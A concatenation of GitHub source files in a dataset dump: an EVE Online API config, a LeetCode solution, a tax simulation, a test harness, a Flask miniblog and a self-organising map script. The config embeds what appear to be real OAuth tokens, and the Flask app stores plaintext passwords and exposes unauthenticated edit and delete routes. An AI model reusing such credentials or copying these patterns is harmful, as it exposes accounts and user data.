\"7e1Oqv_aG8zaUrhmAEslqWeZ0WNozVh2UGt3_c7CV3uIxPkCVmMgTIC4DaFYZdkrfsAxcPQyAqcFNwTIWJXF2a_NcXSoUVgWkZCxex-XvFhPxML8gvRO-NK4an3_S3BQf4A8YOpoVnpmWY2IMKyf3d5h14XSPj_G2q5_Wd0k1ThQmmopu6_lD6sezT_eAZ6dVi5sNndeRNiGhi386__sIJ6ZWD23Hw5t_QJVudC8FAdtQ--xeuPhkAMcZgnGKU5LdUPWNW_P8XyExdLHCr6jK2EcJc_GlRGvfo8r_cCWsjnWoxt3c-L-1-uW3lfrtynjz3BcFs0RI9tepTUrODfjRkvCYM4pnYVNJ50MaBzuXvY\"\r\n authorization = gen_base64_seat_auth()\r\n authorization = authorization.decode('ascii')\r\n authorization = 'Basic ' + authorization\r\n\r\n # 2115529576\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Host': 'login.eveonline.com',\r\n 'Authorization': authorization\r\n }\r\n\r\n url = \"https://login.eveonline.com/oauth/token\"\r\n payload = {'grant_type': 'refresh_token', 'refresh_token': str(refresh_token)}\r\n\r\n r = requests.post(url, headers=headers, data=payload)\r\n output = json.loads(r.content.decode('utf-8'))\r\n print(output)\r\n\r\ndef manual_request_location():\r\n\r\n access_token = \"1|CfDJ8HHFK/DOe6xKoNPHamc0mCVVB9iCNcpOblsQEtOeQ5Fvhr+5kvx5VUedZp+3y1XDCnMWupl4aVZPtQ6nTp0TTYFO1crgSDDv1qye1LdIGUmH+ovhJgEwnMS1LkA6zLtAnnVwdAfxyNDcFXubmls9NcEWv8F///+RoRkCXS5adYYS\"\r\n character_id = \"2115529576\"\r\n\r\n result_location = api_call_get(\"characters/\" + str(character_id) + \"/wallet/journal/\",\r\n {\"character_id\": character_id, \"token\": access_token, \"page\": 1})\r\n\r\n print(result_location)\r\n print(result_location.reason)\r\n print(result_location.content)\r\n\r\n return result_location.content\r\n\r\n# Function for generating base 64 auth\r\ndef gen_base64_auth():\r\n prebase = str.encode(client_id+\":\"+client_secret)\r\n base64auth = base64.b64encode(prebase)\r\n return base64auth\r\n\r\n# Function for generating base 64 auth\r\ndef gen_base64_seat_auth():\r\n prebase = str.encode(seat_client_id+\":\"+seat_client_secret)\r\n base64auth = base64.b64encode(prebase)\r\n return base64auth\r\n\r\ndef convert_name_to_invtype(name, mydb):\r\n cursor = mydb.cursor()\r\n\r\n location_get = \"SELECT typeID FROM db_static.invTypes WHERE typeName = %s\"\r\n cursor.execute(location_get, (name,))\r\n result_raw = cursor.fetchall()\r\n return result_raw[0][0]\r\n\r\ndef convert_invtype_to_name(invtype, mydb):\r\n cursor = mydb.cursor()\r\n\r\n 
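# the %s placeholder plus the parameter tuple passed to cursor.execute below\r\n    # lets the MySQL driver escape the value, instead of formatting it into the SQL\r\n    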
location_get = \"SELECT typeName FROM db_static.invTypes WHERE typeID = %s\"\r\n cursor.execute(location_get, (invtype,))\r\n result_raw = cursor.fetchall()\r\n return result_raw[0][0]","repo_name":"AWAlexWeber/esi-backend","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"75021241493","text":"# Write a function that takes a string as input and reverse only the vowels of a string.\n# \n# Example 1:\n# \n# Input: \"hello\"\n# Output: \"holle\"\n# Example 2:\n# \n# Input: \"leetcode\"\n# Output: \"leotcede\"\n# Note:\n# The vowels does not include the letter \"y\".\n\ndef reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n vowel=['a','e','i','o','u','A','E','I','O','U']\n v=[]\n sa=[]\n for i in range(0,len(s)):\n sa.append(str(s[i]))\n if s[i] in vowel:\n v.append(str(s[i])) \n v.reverse()\n \n #print v\n vcount=0\n for i in range(0,len(sa)):\n if sa[i] in vowel:\n sa[i]=v[vcount]\n vcount+=1\n \n return ''.join(sa)\n","repo_name":"aniketdn/LeetCode","sub_path":"ReverseVowelsofAString.py","file_name":"ReverseVowelsofAString.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19726320375","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ns_and_p = pd.read_csv('annual_returns.csv')\ns_and_p = s_and_p.loc[s_and_p['Year'].astype(float) > 1960, 'EOY_Mult'].values.astype(float)\ns_and_p = s_and_p - 1\ns_and_p = s_and_p[s_and_p < .3]\n\n\nclass Wealth:\n def __init__(self, contributers=[], current_wealth=10000, investment_return=None, cost_of_living=50000,\n inflation_rate=.0244):\n if len(contributers) == 0:\n print(\"oops, need a contributer\")\n self.investment_return = investment_return\n self.wealth = current_wealth\n self.cost_of_living = cost_of_living\n self.inflation_rate = inflation_rate\n self.contributers = contributers\n self.list_of_records = []\n\n def grow_one_year(self):\n\n self.cost_of_living *= (1 + self.inflation_rate)\n earned_this_year = 0\n for contributer in self.contributers:\n contributer.birthday()\n earned_this_year += contributer.salary\n\n earned_this_year -= fed_tax(earned_this_year)\n earned_this_year -= ca_tax(earned_this_year)\n\n earned_this_year -= self.cost_of_living\n self.wealth += earned_this_year\n if self.investment_return is None:\n this_year_investment_return = np.random.choice(s_and_p)\n else:\n this_year_investment_return = self.investment_return\n\n self.wealth *= (1 + this_year_investment_return)\n\n self.list_of_records.append(\n [contributer.name, contributer.age, contributer.salary, self.wealth, self.cost_of_living,\n this_year_investment_return])\n\n def return_records(self):\n return pd.DataFrame(self.list_of_records, columns=[\"Name\", \"Age\", \"Salary\", \"Wealth\", \"COL\", \"Return%\"])\n\n\nclass Person:\n def __init__(self, name, salary=60000, age=36, retirement_age=65, salary_growth=.04, pension_rate=0):\n self.salary = salary\n self.age = age\n self.retirement_age = retirement_age\n self.salary_growth = salary_growth\n self.highest_salary = salary\n self.name = name\n self.pension_rate = pension_rate\n\n def birthday(self):\n # money_earned = self.salary\n self.salary *= (1 + self.salary_growth)\n if self.highest_salary < self.salary:\n self.highest_salary = self.salary\n\n self.age += 1\n\n if self.age > self.retirement_age:\n 
self.salary = self.highest_salary * self.pension_rate\n\n\ndef wealth_simulation_aggregation(list_of_results, age_out=70, filename='data.csv'):\n    wealth_data = [d.loc[d['Age'] == age_out, 'Wealth'] for d in list_of_results]\n    big_array = np.vstack(wealth_data)\n\n    age_array = big_array[:, 0]\n    age_array.sort()\n\n    x = np.arange(0, 1, 1.0 / age_array.shape[0])\n    plt.plot(x, age_array)\n    plt.plot(age_array, 1 - x)\n\n    df_out = pd.DataFrame({'wealth': age_array, 'probability': (1 - x)})\n\n    df_out.iloc[np.arange(0, 1000, 10), :].to_csv(filename, index=False)\n\n\ndef ca_tax(income):\n    if income < 17618:\n        return .01 * income\n    elif income < 41766:\n        return 176.18 + .0200 * (income - 17618)\n    elif income < 65920:\n        return 659.14 + .0400 * (income - 41766)\n    elif income < 91506:\n        return 1625.3 + .0600 * (income - 65920)\n    elif income < 115648:\n        return 3160.46 + .0800 * (income - 91506)\n    elif income < 590746:\n        return 5091.82 + .093 * (income - 115648)\n    elif income < 708890:\n        return 49275 + .103 * (income - 590746)\n    else:\n        return 61444.76 + .1130 * (income - 708890)\n\n\ndef fed_tax(income):\n    taxes = 0\n    if income < 19400:\n        taxes += income * .1\n        return taxes\n    else:\n        taxes += 19400 * .1\n        if income < 78950:\n            taxes = taxes + (income - 19400) * .12\n            return taxes\n        else:\n            taxes = taxes + (78950 - 19400) * .12\n            if income < 168400:\n                taxes = taxes + (income - 78950) * .22\n                return taxes\n            else:\n                taxes = taxes + (168400 - 78950) * .22\n                if income < 321450:\n                    taxes = taxes + (income - 168400) * .24\n                    return taxes\n                else:\n                    taxes = taxes + (321450 - 168400) * .24\n                    if income < 408200:\n                        taxes = taxes + (income - 321450) * .32\n                        return taxes\n                    else:\n                        taxes = taxes + (408200 - 321450) * .32\n                        if income < 612350:\n                            taxes = taxes + (income - 408200) * .35\n                            return taxes\n                        else:\n                            taxes = taxes + (612350 - 408200) * .35\n                            taxes = taxes + (income - 612350) * .37\n                            return taxes\n","repo_name":"cjstev/wealth_simulation","sub_path":"wealth_lib.py","file_name":"wealth_lib.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
{"seq_id":"8176415402","text":"import os\nimport sys\nimport random\nimport unittest\nimport subprocess\n\nimport numpy as np\n\n\ncheck_output = lambda x: subprocess.check_output(x, universal_newlines=True)\n\n\nclass Lab2Coverage(unittest.TestCase):\n\n    def setUp(self):\n        \"\"\"\n        Generate coverage report\n        \"\"\"\n\n        # Remove bash-playground folder\n        subprocess.check_call([\"make\", \"test\"])\n\n\n    def test_Matrix_coverage(self):\n        \"\"\"\n        Check if the test coverage of the Matrix.cpp is 100%\n        \"\"\"\n\n        coverage = \"not found\"\n        for l in check_output([\"python3\", \"coverage.py\", \"-r\", \".\", \"-f\", \"Matrix.cpp\"]).split(\"\\n\"):\n            if l.startswith(\"Matrix.cpp\"):\n                coverage = l.split()[3]\n\n        self.assertEqual(coverage, \"100%\", msg=\"Test coverage is not 100%\")\n\n\nclass Lab2CppTest(unittest.TestCase):\n\n    def setUp(self):\n        \"\"\"\n        Compile the program before testing\n        \"\"\"\n        subprocess.check_call([\"make\", \"all\"])\n\n    \n    def randmatrix(self, m, n):\n        \"\"\"\n        Generate a matrix with random elements\n        \"\"\"\n        A = np.random.randint(0, 100, size=[m, n])\n        A[A > 10] = 0\n        return A\n\n\n    def save(self, M, filename):\n        \"\"\"\n        Save matrix M to file using the specified format\n        \"\"\"\n        m, n = M.shape\n\n        np.savetxt(filename, M, fmt='%d', header=\"{} {}\".format(m, n), comments='')\n\n\n    def load(self, filename):\n        \"\"\"\n        Load matrix from file.\n        \"\"\"\n\n        return 
np.loadtxt(filename, dtype='int32', skiprows=1)\n\n\n def multiply(self, A, B):\n \"\"\"\n Multiply two matrices\n \"\"\"\n\n return np.matmul(A, B)\n\n\n def test_example(self):\n \"\"\"\n Check the program against provided test_example\n \"\"\"\n\n m, p, n = 3, 3, 2\n A = np.array([[-2, 0, 0], [0, 1, 0], [0, 0, -1]], dtype='int8')\n B = np.array([[1, 2], [3, 4], [5, 6]], dtype='int8')\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\")\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n\n\n def test_vector_vector(self):\n \"\"\"\n Check vector (m by 1) multiplied with vector (1 by n)\n \"\"\"\n\n m, p, n = 700, 1, 700\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\")\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n \n def test_vector_vector2(self):\n \"\"\"\n Check vector (1 by p) multiplied with vector (p by 1)\n \"\"\"\n\n m, p, n = 1, 10000, 1\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\").reshape(m, n)\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n \n def test_matrix_vector(self):\n \"\"\"\n Check matrix (m by p) multiplied with vector (p by 1)\n \"\"\"\n\n m, p, n = random.randint(400, 500), random.randint(400, 500), 1\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\").reshape(m, n)\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n\n def test_large_matrix_matrix(self):\n \"\"\"\n Check matrix (m by p) multiplied with matrix (p by n)\n \"\"\"\n\n m, p, n = random.randint(400, 500), random.randint(400, 500), random.randint(400, 500)\n\n A = self.randmatrix(m, p)\n B = self.randmatrix(p, n)\n\n self.save(A, \"A.txt\")\n self.save(B, \"B.txt\")\n\n subprocess.check_call([\"./lab2.out\", \"A.txt\", \"B.txt\"])\n\n C = self.load(\"result.txt\")\n\n self.assertTrue(np.array_equal(self.multiply(A,B), C), msg=\"Incorrect multiplication result\")\n\n \nif __name__ == '__main__':\n\n suite = unittest.TestSuite()\n\n if len(sys.argv) == 2 and sys.argv[1] == \"test-tdd\":\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2Coverage))\n elif len(sys.argv) == 2 and sys.argv[1] == \"test-cpp\":\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2CppTest))\n else:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2Coverage))\n suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(Lab2CppTest))\n\n\n result = unittest.TextTestRunner().run(suite)\n\n # Set the exit code based on the test result\n sys.exit(not result.wasSuccessful())\n","repo_name":"wolvestotem/System-verification-lab","sub_path":"lab2/lab2_test.py","file_name":"lab2_test.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72137973975","text":"# I M P O R T S .\n\nfrom flask import 
Flask, render_template, redirect, request, url_for\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import ForeignKey\nfrom datetime import *\n\n#App create\napp= Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@localhost/miniblog'\n\n#App reception\ndb = SQLAlchemy(app)\n\n#Migrate instantiation\nmigrate = Migrate(app, db)\n\n#Create table \"USER\"\nclass User(db.Model):\n __tablename__ = 'user'\n \n id = db.Column(db.Integer,\n primary_key = True\n )\n\n username = db.Column(\n db.String(100),\n nullable = False,\n unique = True\n )\n\n password = db.Column(\n db.String(100),\n nullable = False\n )\n\n email = db.Column(\n db.String(100),\n nullable = False,\n unique = True\n )\n def __str__(self):\n return self.name\n\n#Create table \"CATEGORY\"\nclass Category(db.Model):\n __tablename__= 'category'\n\n id = db.Column(\n db.Integer, \n primary_key=True\n )\n \n category_name = db.Column(\n db.String(50), \n nullable=False\n )\n\n def __str__(self):\n return self.name\n\n#Create table \"POST\"\nclass Post(db.Model):\n __tablename__ = 'post'\n\n id = db.Column(\n db.Integer,\n primary_key= True\n )\n\n title = db.Column(\n db.String(100),\n nullable= False\n )\n\n content = db.Column(\n db.Text,\n nullable= False\n )\n\n date = db.Column(\n db.DateTime,\n nullable= False,\n default= datetime.utcnow\n )\n\n author_id= db.Column(\n db.Integer,\n db.ForeignKey('user.id'),\n nullable= False\n )\n\n category_id= db.Column(\n db.Integer,\n db.ForeignKey('category.id'),\n nullable= False\n )\n\n def __str__(self):\n return self.name\n\nclass Comment(db.Model):\n __tablename__ = 'comment'\n\n id = db.Column(\n db.Integer,\n primary_key= True\n )\n\n content = db.Column(\n db.Text,\n nullable= False\n )\n\n date = db.Column(\n db.DateTime,\n nullable= False,\n default= datetime.utcnow\n )\n \n author_id = db.Column(\n db.Integer,\n db.ForeignKey('user.id'),\n nullable= False\n )\n\n post_id = db.Column(\n db.Integer,\n db.ForeignKey('post.id'),\n nullable= False\n )\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if request.method == 'POST':\n title = request.form['title']\n content = request.form['content']\n author_id = request.form['author']\n category_id = request.form['category-post']\n \n new_post= Post(\n title=title,\n content= content,\n author_id = author_id,\n category_id = category_id\n )\n\n db.session.add(new_post)\n db.session.commit()\n\n return redirect(url_for('index'))\n else:\n return render_template(\n 'index.html'\n ) \ndef format_text(text):\n formatted_text = text.replace('\\n', '
')\n return formatted_text\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n username = request.form['username']\n email = request.form['email']\n password = request.form['password']\n \n new_user = User(username=username,\n email=email,\n password=password\n )\n db.session.add(new_user)\n db.session.commit()\n\n return redirect(url_for('index'))\n else:\n return render_template('register.html')\n\n@app.context_processor\ndef inject_posts():\n posts = db.session.query(Post).all()\n formatted_posts = []\n \n\n for post in posts:\n author = db.session.query(User).get(post.author_id)\n formatted_post = {\n 'id': post.id,\n 'title': post.title,\n 'content': format_text(post.content),\n 'author': author.username,\n 'date': post.date\n }\n formatted_posts.append(formatted_post)\n\n return {'posts': formatted_posts} \n\n@app.context_processor\ndef inject_users():\n users = db.session.query(User).all()\n return dict(\n users = users\n )\n\n@app.context_processor\ndef inject_categories():\n categories = Category.query.all()\n return dict(categories=categories)\n\n@app.route('/edit/', methods=['GET', 'POST'])\ndef edit_post(id):\n post = Post.query.get(id)\n\n if request.method == 'POST':\n post.title = request.form['title']\n post.content = request.form['content']\n post.author_id = request.form['author']\n post.category_id = request.form['category-post']\n\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('edit.html', post=post)\n\n@app.route('/delete/')\ndef delete_post(id): \n post = Post.query.get(id)\n Comment.query.filter_by(post_id=id).delete()\n db.session.delete(post)\n db.session.commit()\n return redirect(url_for('index'))\n\n\n@app.route('/comments/')\ndef show_comments(id):\n post = Post.query.get(id)\n comments = Comment.query.filter_by(post_id=id).all()\n\n formatted_comments = []\n for comment in comments:\n author = User.query.get(comment.author_id)\n formatted_comment = {\n 'content': comment.content,\n 'date': comment.date,\n 'author': author.username\n }\n formatted_comments.append(formatted_comment)\n\n return render_template('comments.html', post=post, comments=formatted_comments)\n\n\n@app.route('/add-comment', methods=['POST'])\ndef add_comment():\n content = request.form['content']\n author_id = request.form['author']\n post_id = request.form['post']\n\n new_comment = Comment(\n content=content,\n author_id=author_id,\n post_id=post_id\n )\n\n db.session.add(new_comment)\n db.session.commit()\n\n return redirect(url_for('index'))\n\n","repo_name":"juanjcenturion/centurion-pit_stop-miniblog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33988912960","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 5 11:43:08 2018\n\n@author: gustavo.collaco\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# normalize the values array\ndef normalize(values):\n return (values - values.min()) / (values.max() - values.min())\n\n# find representation (slow)\ndef find_representation(dimension, neuron_weights, n_inputs, values, answers):\n most_similar = np.zeros((dimension, dimension))\n total_inputs = len(values)\n distances = []\n for j in range(dimension):\n for k in range(dimension):\n \n for i in range(total_inputs):\n distance = 0\n for l in range(n_inputs):\n distance += (values[i][l] - 
neuron_weights[j][k][l]) ** 2\n \n distances.append(np.sqrt(distance))\n \n index_most_similar = np.argmin(distances)\n \n distances = []\n most_similar[j][k] = answers[index_most_similar]\n \n # array containing the most similar values (results from the expected output array)\n # for each 'pixel'\n return most_similar\n \n# plot the values\ndef plot_data_final(dimension, neuron_weights, n_inputs):\n img = np.zeros((dimension, dimension))\n for i in range(dimension):\n for j in range(dimension):\n aux = 0\n for k in range(n_inputs):\n aux += neuron_weights[i][j][k]**2\n img[i][j] = np.sqrt(aux)\n \n plt.figure()\n plt.title(\"Weights updated\")\n plt.imshow(img)\n\n# plot the best matching units\ndef plot_bmu(dimension, best_matching_units, best_matching_units_result, n_inputs):\n img = np.zeros((dimension, dimension))\n fig, ax = plt.subplots()\n \n for i in range(dimension):\n for j in range(dimension):\n value = len(set(best_matching_units_result)) + 1\n value_all = []\n \n if [i, j] in best_matching_units:\n all_found = [k for k, e in enumerate(best_matching_units) if e == [i, j]]\n value = best_matching_units_result[all_found[0]]\n \n if(len(all_found) > 0):\n for z in range(len(all_found)):\n value_all.append(best_matching_units_result[all_found[z]])\n \n value_all = list(set(value_all))\n value = round(sum(value_all) / len(value_all), 2)\n \n img[j][i] = value\n \n img_plt = ax.imshow(img)\n \n # annotations\n for i in range(dimension):\n for j in range(dimension):\n text = ax.text(i, j, img[j, i], ha=\"center\", va=\"center\", color=\"w\")\n\n #plt.figure()\n plt.title(\"Last epochs' best matching units\")\n plt.show()\n\n\n# plot the umatrix\ndef plot_umatrix(dimension, values, neuron_weights, n_inputs, total_inputs, answers):\n img = np.zeros((dimension, dimension))\n \n fig, ax = plt.subplots()\n \n for i in range(dimension):\n for j in range(dimension):\n value = 0\n # checking all possible positions on the grid\n # top left\n if(i == j == 0):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2) \n value = distance / 3\n \n # top right\n elif(i == 0 and j == dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2) \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2) \n value = distance / 3\n \n # bottom left\n elif(i == dimension-1 and j == 0):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 3\n \n # bottom right\n elif(i == dimension-1 and j == dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += 
np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n value = distance / 3\n \n # left middle\n elif(j == 0 and i != 0 and i != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 5\n \n # top middle\n elif(i == 0 and j != 0 and j != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 5\n \n # bottom middle\n elif(i == dimension-1 and j != 0 and j != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n value = distance / 5\n \n # right middle\n elif(j == dimension-1 and i != 0 and i != dimension-1):\n distance = 0 \n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n value = distance / 5\n \n # filling the middle\n else:\n distance = 0\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j-1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i+1][j+1][l]) ** 2)\n for l in range(n_inputs): distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i][j+1][l]) ** 2)\n for l in range(n_inputs): 
distance += np.sqrt((neuron_weights[i][j][l] - neuron_weights[i-1][j+1][l]) ** 2)\n value = distance / 8\n \n img[i][j] = value\n\n img_plt = ax.imshow(img)\n \n most_similar = find_representation(dimension, neuron_weights, n_inputs, total_inputs, answers)\n \n # annotations\n for i in range(dimension):\n for j in range(dimension):\n text = ax.text(j, i, most_similar[i, j], ha=\"center\", va=\"center\", color=\"w\")\n\n plt.title(\"Umatrix\")\n plt.show()\n\n# dataset preparation function\ndef dataset():\n # read csv file\n data = pd.read_csv(\"dataset_iris.csv\", header=None, sep=\",\")\n # shuffles the data\n data = data.sample(frac=1).reset_index(drop=True)\n # inputs\n values = data.iloc[:, :-1]\n # answers\n answers = data.iloc[:, -1]\n \n # rearranging the values and answers\n values = normalize(values).values\n answers = pd.factorize(answers)[0]\n \n # weights matrix\n dimension_x = dimension_y = int(np.sqrt(round(np.sqrt(2) * np.size(values, 0))))\n n_inputs = len(values[0])\n neuron_weights = np.random.uniform(low=-0.1, high=0.1, size=(dimension_x, dimension_y, n_inputs))\n\n # returning values, answers and weights\n return values, answers, neuron_weights\n\n# competition\ndef kohonen(values, answers, neuron_weights, learning_rate=0.3, n_epochs=100):\n n_inputs = len(values[0])\n total_inputs = len(values)\n dimension = len(neuron_weights[0])\n \n # new \n sigma0 = None\n sigma = None\n initial_learning_rate = learning_rate\n new_learning_rate = learning_rate\n \n # iterate through all epochs\n for epoch in range(n_epochs):\n best_matching_units = []\n best_matching_units_result = []\n \n for i in range(total_inputs):\n \n # calculate all the distances for this input\n distances = []\n for j in range(dimension):\n for k in range(dimension):\n \n distance = 0\n for l in range(n_inputs):\n distance += (values[i][l] - neuron_weights[j][k][l]) ** 2\n \n distances.append(np.sqrt(distance))\n #distances.append(distance)\n \n # minimum distance value (winner)\n index_winner = np.argmin(distances)\n x_winner = index_winner % dimension\n y_winner = int(index_winner / dimension)\n \n # calculate the distances related to the winner \n distances_winner = []\n for y_neuron in range(dimension):\n for x_neuron in range(dimension):\n \n distance = 0\n distance = (x_winner - x_neuron) ** 2 + (y_winner - y_neuron) ** 2\n distances_winner.append(np.sqrt(distance))\n #distances_winner.append(distance)\n\n # adding the winner to the best_matching_units array\n best_matching_units.append([x_winner, y_winner])\n best_matching_units_result.append(answers[i])\n \n if sigma is None:\n sigma = sigma0 = np.sqrt(-(dimension**2) / (2*np.log(0.1)))\n tau = n_epochs / np.log(sigma0/0.1)\n #sigma = sigma0 = np.sqrt(dimension ** 2 + dimension ** 2)\n #tau = (-1) * n_epochs / np.log((5*10**(-5)) / sigma0)#sigma0\n \n # update the weights\n for j in range(dimension):\n for k in range(dimension):\n pos = j * dimension + k\n \n h = np.exp((-1) * distances_winner[pos]**2 / (2 * sigma**2))\n \n for l in range(n_inputs):\n neuron_weights[j][k][l] = neuron_weights[j][k][l] + new_learning_rate * h * (values[i][l] - neuron_weights[j][k][l]) #distances[pos]\n\n sigma = sigma0 * np.exp((-1) * epoch / tau)\n new_learning_rate = initial_learning_rate * np.exp((-1) * epoch / tau)\n \n # prints the actual epoch\n print('Actual epoch: ', epoch)\n print('Learning Rate: ', new_learning_rate)\n print('Sigma: ', sigma)\n print('____________________')\n\n # plotting the final data\n plot_data_final(dimension, neuron_weights, 
